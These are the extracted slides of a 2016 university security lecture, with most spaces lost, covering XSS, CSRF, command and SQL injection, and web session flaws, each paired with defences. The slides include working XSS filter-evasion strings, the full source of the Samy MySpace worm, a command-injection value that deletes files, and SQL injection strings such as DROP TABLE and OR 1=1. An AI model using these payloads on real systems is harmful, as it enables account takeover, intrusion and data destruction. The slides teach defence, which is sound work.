CSE 484 / CSE M 584: Computer Security and Privacy XSS attacks · OWASP Top 10 Web Vulnerabilities...
39
CSE 484 / CSE M 584: Computer Security and Privacy XSS attacks Fall 2016 Ada (Adam) Lerner [email protected] Thanks to Franzi Roesner, Dan Boneh, Dieter Gollmann, Dan Halperin, Yoshi Kohno, John Manferdelli, John Mitchell, Vitaly Shmatikov, Bennet Yee, and many others for sample slides and materials ...
Transcript of CSE 484 / CSE M 584: Computer Security and Privacy XSS attacks · OWASP Top 10 Web Vulnerabilities...
CSE484/CSEM584:ComputerSecurityandPrivacy
XSSattacks
Fall2016
Ada(Adam)[email protected]
ThankstoFranziRoesner,DanBoneh,DieterGollmann,DanHalperin,YoshiKohno,JohnManferdelli,JohnMitchell,VitalyShmatikov,BennetYee,andmanyothersforsampleslidesandmaterials...
OWASPTop10WebVulnerabilities
1. Injection2. BrokenAuthentication&SessionManagement3. Cross-SiteScripting4. InsecureDirectObjectReferences5. SecurityMisconfiguration6. SensitiveDataExposure7. MissingFunctionLevelAccessControl8. Cross-SiteRequestForgery9. UsingKnownVulnerableComponents10. UnvalidatedRedirectsandForwards
11/14/16 CSE484/CSEM584-Fall2016 2
http://www.owasp.org
CSRF
• “ConfusedDeputy”–thebrowseractswithAlice’sprivileges(cookies)evenwhendirectedtomakerequestsbyanattacker
• Defenses:– Formsynchronizationtokens– Refererheaderchecking
11/14/16 CSE484/CSEM584-Fall2016 3
Cross-SiteScripting(XSS)
11/14/16 CSE484/CSEM584-Fall2016 4
XSS
• Ihaveafriendwithareallyhardtopronouncename.
11/14/16 CSE484/CSEM584-Fall2016 5
Hernameis“<img src=‘http://upload.wikimedia.org/wikipedia/en/thumb/3/39/YoshiMarioParty9.png/210px-YoshiMarioParty9.png’>”!
PHP:HypertextProcessor
PHP: prints out: <?php echo $name; ?>>
11/14/16 CSE484/CSEM584-Fall2016 6
XSS
• “Reflected”XSS–vulnerableserviceechoesuserinputdirectlyfrominput(e.g.,fromquerystringinURL)– example.com?name=<imgsrc=…
• “Stored”XSS–vulnerableserviceechoesuserinputstoredindatabse– E.g.,Makeasocialmediapostthatincludesa<script>tag,andwhenotherpeoplereadyourpost…
11/14/16 CSE484/CSEM584-Fall2016 7
Defenses:Cross-SiteScripting(XSS)
• Anyuserinputandclient-sidedatamustbepreprocessedbeforeitisusedinsideHTML
• Remove/encodeHTMLspecialcharacters– Useagoodescapinglibrary
• OWASPESAPI(EnterpriseSecurityAPI)• Microsoft’sAntiXSS
– InPHP,htmlspecialchars(string)willreplaceallspecialcharacterswiththeirHTMLcodes• ‘becomes'“becomes"&becomes&
– InASP.NET,Server.HtmlEncode(string)
11/14/16 CSE484/CSEM584-Fall2016 8
Withappropriatedefenses
11/14/16 CSE484/CSEM584-Fall2016 9
naive.com/hello.cgi?name=Bob!
Welcome,dearBob
naive.com/hello.cgi?name=<img src=‘http://upload.wikimedia.org/wikipedia/en/thumb/3/39/YoshiMarioParty9.png/210px-YoshiMarioParty9.png’>!
Welcome,dear<img src=‘!
http://upload.wikimedia.org/!wikipedia/en/thumb/!3/39/YoshiMarioParty9 !.png/210px-YoshiMario !Party9.png’>!
Withfiltersinplace
• <html>Welcome, dear Bob</html>
• <imgsrc=‘http://upload.wikimedia.org/wikipedia/en/thumb/3/39/YoshiMarioParty9.png/210px-YoshiMarioParty9.png’>
11/14/16 CSE484/CSEM584-Fall2016 10
EvadingXSSFilters
• PreventinginjectionofscriptsintoHTMLishard!– Blocking“<”and“>”isnotenough– Eventhandlers,stylesheets,encodedinputs(%3C),etc.
– phpBBallowedsimpleHTMLtagslike<b>
<bc=“>” onmouseover=“script”x=“<b”>Hello<b>
11/14/16 CSE484/CSEM584-Fall2016 11
EvadingXSSFilters
• Filterevasiontricks(XSSCheatSheet)– Iffilterallowsquoting(of<script>,etc.),bewareofmalformedquoting:<IMG"""><SCRIPT>alert("XSS")</SCRIPT>">
– LongUTF-8encoding– Scriptsarenotonlyin<script>:<iframesrc=‘https://bank.com/login’onload=‘steal()’>
11/14/16 CSE484/CSEM584-Fall2016 12
MySpaceWorm(1)
• UserscanpostHTMLontheirMySpacepages• MySpacedoesnotallowscriptsinusers’HTML– No<script>,<body>,onclick,<ahref=javascript://>
• …butdoesallow<div>tagsforCSS.– <divstyle=“background:url(‘javascript:alert(1)’)”>
• ButMySpacewillstripout“javascript”– Use“java<NEWLINE>script”instead
• ButMySpacewillstripoutquotes– Convertfromdecimalinstead:alert('doublequote:'+String.fromCharCode(34))
11/14/16 CSE484/CSEM584-Fall2016 13
http://namb.la/popular/tech.html
MySpaceWorm(2)Resultingcode:
<div id=mycode style="BACKGROUND: url('java �script:eval(document.all.mycode.expr)')" expr="var B=String.fromCharCode(34);var A=String.fromCharCode(39);function g(){var C;try{var D=document.body.createTextRange();C=D.htmlText}catch(e){}if(C){return C}else{return eval('document.body.inne'+'rHTML')}}function getData(AU){M=getFromURL(AU,'friendID');L=getFromURL(AU,'Mytoken')}function getQueryParams(){var E=document.location.search;var F=E.substring(1,E.length).split('&');var AS=new Array();for(var O=0;O<F.length;O++){var I=F[O].split('=');AS[I[0]]=I[1]}return AS}var J;var AS=getQueryParams();var L=AS['Mytoken'];var M=AS['friendID'];if(location.hostname=='profile.myspace.com'){document.location='http://www.myspace.com'+location.pathname+location.search}else{if(!M){getData(g())}main()}function getClientFID(){return findIn(g(),'up_launchIC( '+A,A)}function nothing(){}function paramsToString(AV){var N=new String();var O=0;for(var P in AV){if(O>0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.replace('+','%2B')}while(Q.indexOf('&')!=-1){Q=Q.replace('&','%26')}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}eval('J.onr'+'eadystatechange=BI');J.open(BJ,BH,true);if(BJ=='POST'){J.setRequestHeader('Content-Type','application/x-www-form-urlencoded');J.setRequestHeader('Content-Length',BK.length)}J.send(BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn(BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return Z}var AA=g();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace('jav'+'a',A+'jav'+'a');AE=AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. <d'+'iv id='+AE+'D'+'IV>'}var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes','</td>');AG=AG.substring(61,AG.length);if(AG.indexOf('samy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Preview';AS['interest']=AG;J=getXMLObj();httpSend('/index.cfm?fuseaction=profile.previewInterests&Mytoken='+AR,postHero,'POST',paramsToString(AS))}}}function postHero(){if(J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Submit';AS['interest']=AG;AS['hash']=getHiddenParameter(AU,'hash');httpSend('/index.cfm?fuseaction=profile.processInterests&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function main(){var AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L;J=getXMLObj();httpSend(BH,getHome,'GET');xmlhttp2=getXMLObj();httpSend2('/index.cfm?fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,processxForm,'GET')}function processxForm(){if(xmlhttp2.readyState!=4){return}var AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658';AS['submit']='Add to Friends';httpSend2('/index.cfm?fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function httpSend2(BH,BI,BJ,BK){if(!xmlhttp2){return false}eval('xmlhttp2.onr'+'eadystatechange=BI');xmlhttp2.open(BJ,BH,true);if(BJ=='POST'){xmlhttp2.setRequestHeader('Content-Type','application/x-www-form-urlencoded');xmlhttp2.setRequestHeader('Content-Length',BK.length)}xmlhttp2.send(BK);return true}"></DIV>
http://namb.la/popular/tech.html
11/14/16 CSE484/CSEM584-Fall2016 14
MySpaceWorm(3)• “Therewereafewothercomplicationsandthingstogetaround.Thiswasnotbyanymeansastraightforwardprocess,andnoneofthiswasmeanttocauseanydamageorpissanyoneoff.Thiswasintheinterestof..interest.Itwasinterestingandfun!”
• Startedon“samy”MySpacepage• Everybodywhovisitsaninfectedpage,becomes
infectedandadds“samy”asafriendandhero• 5hourslater“samy”has1,005,831friends
– Wasadding1,000friendspersecondatitspeak
11/14/16 CSE484/CSEM584-Fall2016 15
http://namb.la/popular/tech.html
CommandInjectionandSQLInjection
11/14/16 CSE484/CSEM584-Spring2016 16
CommandInjectioninPHP
http://victim.com/copy.php?name=usernamecopy.phpincludessystem(“cptemp.dat$name.dat”)
11/14/16 CSE484/CSEM584-Spring2016 17
CommandInjectioninPHP
http://victim.com/copy.php?name=usernamecopy.phpincludessystem(“cptemp.dat$name.dat”)Whatifusername=“/etc/shadow”?
11/14/16 CSE484/CSEM584-Spring2016 18
CommandInjectioninPHP
http://victim.com/copy.php?name=usernamecopy.phpincludessystem(“cptemp.dat$name.dat”)Attackerusesname“a;rm*”http://victim.com/copy.php?name=“a;rm*”
11/14/16 CSE484/CSEM584-Spring2016 19
copy.phpexecutessystem(“cptemp.data;rm*.dat”);
SQL
• Widelyuseddatabasequerylanguage• Fetchasetofrecords
SELECT*FROMPersonWHEREUsername=‘lerner’
• AdddatatothetableINSERTINTOKey(Username,Key)VALUES(‘lerner’,3611BBFF)
• ModifydataUPDATEKeysSETKey=FA33452DWHEREPersonID=5
• Querysyntax(mostly)independentofvendor
11/14/16 CSE484/CSEM584-Spring2016 20
NaïveQueryGenerationCode
$selecteduser=$_GET['user'];$sql="SELECTUsername,KeyFROMKey"."WHEREUsername='$selecteduser'";$rs=$db->executeQuery($sql);
Whatif‘user’isamaliciousstringthatchangesthemeaningofthequery?
11/14/16 CSE484/CSEM584-Spring2016 21
TypicalLoginPrompt
11/14/16 CSE484/CSEM584-Spring2016 22
UserInputBecomesPartofQuery
11/14/16 CSE484/CSEM584-Spring2016 23
EnterUsername
&Password Web
server
Webbrowser(Client)
DB
SELECTpasswdFROMUSERSWHEREuname
IS‘$user’
NormalLogin
11/14/16 CSE484/CSEM584-Spring2016 24
EnterUsername
&Password Web
server
Webbrowser(Client)
DB
SELECTpasswdFROMUSERSWHEREuname
IS‘franzi’
MaliciousUserInput
11/14/16 CSE484/CSEM584-Spring2016 25
SQLInjectionAttack
11/14/16 CSE484/CSEM584-Spring2016 26
EnterUsername
&Password Web
server
Webbrowser(Client)
DB
SELECTpasswdFROMUSERSWHEREuname
IS‘’;DROPTABLEUSERS;--’
Eliminatesalluseraccounts
ExploitsofaMom
11/14/16 CSE484/CSEM584-Spring2016 27
http://xkcd.com/327/
SQLInjection:BasicIdea
11/14/16 CSE484/CSEM584-Spring2016 28
Victimserver
VictimSQLDB
Attacker postmaliciousform
unintendedquery
receivedatafromDB
1
2
3
• Thisisaninputvalidationvulnerability• UnsanitizeduserinputinSQLquerytoback-end
databasechangesthemeaningofquery• Specialcaseofcommandinjection
AuthenticationwithBackendDBsetUserFound=execute(“SELECT*FROMUserTableWHEREusername=‘ ”&form(“user”)&“′ANDpassword=‘ ”&form(“pwd”)&“′”);
Usersuppliesusernameandpassword,thisSQLquerychecksifuser/passwordcombinationisinthedatabase
IfnotUserFound.EOFAuthenticationcorrectelseFail
11/14/16 CSE484/CSEM584-Spring2016 29
OnlytrueiftheresultofSQLqueryisnotempty,i.e.,user/pwdisinthedatabase
UsingSQLInjectiontoLogIn
• Usergivesusername’OR1=1--• WebserverexecutesquerysetUserFound=execute(SELECT*FROMUserTableWHEREusername=‘’OR1=1--…);
• Nowallrecordsmatchthequery,sotheresultisnotempty⇒correct“authentication”!
11/14/16 CSE484/CSEM584-Spring2016 30
Alwaystrue! Everythingafter--isignored!
PreventingSQLInjection
• Validateallinputs– Filteroutanycharacterthathasspecialmeaning
• Apostrophes,semicolons,percent,hyphens,underscores,…• Useescapecharacterstopreventspecialcharactersformbecomingpartofthequerycode– E.g.:escape(O’Connor)=O\’Connor
– Checkthedatatype(e.g.,inputmustbeaninteger)
11/14/16 CSE484/CSEM584-Spring2016 31
PreparedStatementsPreparedStatementps=db.prepareStatement("SELECTpizza,toppings,quantity,order_day"+"FROMordersWHEREuserid=?ANDorder_month=?");ps.setInt(1,session.getCurrentUserId());ps.setInt(2,Integer.parseInt(request.getParamenter("month")));ResultSetres=ps.executeQuery();• Bindvariables:placeholdersguaranteedtobedata(notcode)• Queryisparsedwithoutdataparameters• Bindvariablesaretyped(int,string,…)
11/14/16 CSE484/CSEM584-Spring2016 32
Bindvariable(dataplaceholder)
http://java.sun.com/docs/books/tutorial/jdbc/basics/prepared.html
TopWebVulnerabilities:Summary
• XSRF(CSRF)–cross-siterequestforgery– Badwebsiteforcestheuser’sbrowsertosendarequesttoagoodwebsite
• XSS(CSS)–cross-sitescripting– Maliciouscodeinjectedintoatrustedcontext(e.g.,maliciousdatapresentedbyanhonestwebsiteinterpretedascodebytheuser’sbrowser)
• SQLinjection– Maliciousdatasenttoawebsiteisinterpretedascodeinaquerytothewebsite’sback-enddatabase
11/14/16 CSE484/CSEM584-Spring2016 33
WebSessionManagement
11/14/16 CSE484/CSEM584-Spring2016 34
PrimitiveBrowserSession
11/14/16 CSE484/CSEM584-Spring2016 35
www.e_buy.com
www.e_buy.com/shopping.cfm?
pID=269
Viewcatalog
www.e_buy.com/shopping.cfm?
pID=269&item1=102030405
www.e_buy.com/checkout.cfm?pID=269&
item1=102030405
CheckoutSelectitem
StoresessioninformationinURL;easilyreadonnetwork
BadIdea:EncodingStateinURL
• Unstable,frequentlychangingURLs• Vulnerabletoeavesdroppingandmodification• ThereisnoguaranteethatURLisprivate
11/14/16 CSE484/CSEM584-Spring2016 36
FatBrain.comcirca1999
• Userlogsintowebsitewithhispassword,authenticatorisgenerated,userisgivenspecialURLcontainingtheauthenticator
– WithspecialURL,userdoesn’tneedtore-authenticate
• Reasoning:usercouldnothavenotknownthespecialURLwithoutauthenticatingfirst.That’strue,BUT…
• Authenticatorsareglobalsequencenumbers– It’seasytoguesssequencenumberforanotheruser
– Partialfix:userandomauthenticators
11/14/16 CSE484/CSEM584-Spring2016 37
https://www.fatbrain.com/HelpAccount.asp?t=0&[email protected]&p2=540555758
https://www.fatbrain.com/HelpAccount.asp?t=0&p1=SomeoneElse&p2=540555752
TypicalSolution:WebAuthenticationviaCookies
• Serverscanusecookiestostorestateonclient– Whensessionstarts,servercomputesanauthenticator
andgivesitbacktobrowserintheformofacookie• Authenticatorsmustbeunforgeableandtamper-proof
– Maliciousclientshouldn’tbeabletocomputehisownormodifyanexistingauthenticator
• Example:MAC(server’ssecretkey,sessionid)– Witheachrequest,browserpresentsthecookie– Serverrecomputesandverifiestheauthenticator
• Serverdoesnotneedtoremembertheauthenticator
11/14/16 CSE484/CSEM584-Spring2016 38
StoringStateinHiddenForms
11/14/16 CSE484/CSEM584-Spring2016 39
• DansieShoppingCart(2006)– “Apremium,comprehensive,Perlshoppingcart.Increaseyourweb
salesbymakingiteasierforyourwebstorecustomerstoorder.”
<FORM METHOD=POST ACTION="http://www.dansie.net/cgi-bin/scripts/cart.pl">
Black Leather purse with leather straps<BR>Price: $20.00<BR>
<INPUT TYPE=HIDDEN NAME=name VALUE="Black leather purse"> <INPUT TYPE=HIDDEN NAME=price VALUE="20.00"> <INPUT TYPE=HIDDEN NAME=sh VALUE="1"> <INPUT TYPE=HIDDEN NAME=img VALUE="purse.jpg"> <INPUT TYPE=HIDDEN NAME=custom1 VALUE="Black leather purse
with leather straps">
<INPUT TYPE=SUBMIT NAME="add" VALUE="Put in Shopping Cart">
</FORM>
Changethisto2.00
Bargainshopping!
Fix:MACclient-sidedata,or,morelikely,keeponserver.
